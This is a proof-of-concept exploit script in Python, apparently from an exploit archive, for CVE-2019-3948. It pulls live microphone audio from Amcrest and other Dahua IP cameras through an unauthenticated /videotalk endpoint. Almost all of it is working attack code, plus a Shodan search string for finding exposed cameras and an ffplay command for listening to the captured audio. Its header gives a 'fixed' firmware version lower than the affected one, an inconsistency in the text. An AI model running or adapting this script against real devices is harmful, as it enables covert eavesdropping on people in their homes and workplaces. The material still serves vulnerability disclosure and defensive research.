## # Exploit Title: Unauthenticated Audio Streaming from Amcrest Camera # Shodan Dork: html:"@WebVersion@" # Date: 08/29/2019 # Exploit Author: Jacob Baines # Vendor Homepage: https://amcrest.com/ # Software Link: https://amcrest.com/firmwaredownloads # Affected Version: V2.520.AC00.18.R # Fixed Version: V2.420.AC00.18.R # Tested on: Tested on Amcrest IP2M-841 but known to affect other Dahua devices. # CVE : CVE-2019-3948 # Disclosure: https://www.tenable.com/security/research/tra-2019-36 # Disclosure: https://sup-files.s3.us-east-2.amazonaws.com/Firmware/IP2M-841/JS+IP2M-841/Changelog/841_721_HX1_changelog_20190729.txt # # To decode the scripts output using ffplay use: # ffplay -f alaw -ar 8k -ac 1 [poc output] # Note that this assumes the camera is using the default encoding options. ## import argparse import socket import struct import sys ## # Read in the specified amount of data. Continuing looping until we get it all... # what could go wrong? # # @return the data we read in ## def recv_all(sock, amount): data = '' while len(data) != amount: temp_data = sock.recv(amount - len(data)) data = data + temp_data return data top_parser = argparse.ArgumentParser(description='Download audio from the HTTP videotalk endpoint') top_parser.add_argument('-i', '--ip', action="store", dest="ip", required=True, help="The IPv4 address to connect to") top_parser.add_argument('-p', '--port', action="store", dest="port", type=int, help="The port to connect to", default="80") top_parser.add_argument('-o', '--output', action="store", dest="output", help="The file to write the audio to") top_parser.add_argument('-b', '--bytes', action="store", dest="bytes", type=int, help="The amount of audio to download", default="1048576") args = top_parser.parse_args() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setblocking(True) print "[+] Attempting connection to " + args.ip + ":" + str(args.port) sock.connect((args.ip, args.port)) print "[+] Connected!" request = ('GET /videotalk HTTP/1.1\r\n' + 'Host: ' + args.ip + ':' + str(args.port) + '\r\n' + 'Range: bytes=0-\r\n' + '\r\n') sock.sendall(request) status = '' header = '' # read in the HTTP response. Store the status. while (header != '\r\n'): header = header + sock.recv(1); if (header.find('\r\n') > 0): header = header.strip() if (len(status) == 0): status = header header = '' if (status.find('200 OK') == -1): print '[-] Bad HTTP status. We received: "' + status + '"' sock.close() exit() else: print '[+] Downloading ' + str(args.bytes) + ' bytes of audio ...' total_audio = '' while (len(total_audio) < args.bytes): # read in the header length header_length = recv_all(sock, 4) hlength = struct.unpack("I", header_length)[0] if (hlength != 36): print '[-] Unexpected header length' sock.close() exit() # read in the header and extract the payload length header = recv_all(sock, hlength) plength = struct.unpack_from(">H", header)[0] if (plength != 368): print '[-] Unexpected payload length' sock.close() exit() # there is a seq no in the header but since this is over # tcp is sort of useless. dhav = header[2:6] if (dhav != "DHAV"): print '[-] Invalid header' exit(0) # extract the audio. I'm really not sure what the first 6 bytes are # but the last 8 serve as a type of trailer whatami = recv_all(sock, 6) audio = recv_all(sock, plength - hlength - 12) trailer = recv_all(sock, 8) if (trailer != 'dhavp\x01\x00\x00'): print '[-] Invalid end of frame' sock.close() exit() total_audio = total_audio + audio sys.stdout.write('\r'+ str(len(total_audio)) + " / " + str(args.bytes)) sys.stdout.flush() print '' print '[+] Finished receiving audio.' print '[+] Closing socket' out_file = open(args.output, 'wb') out_file.write(total_audio) out_file.close() sock.close()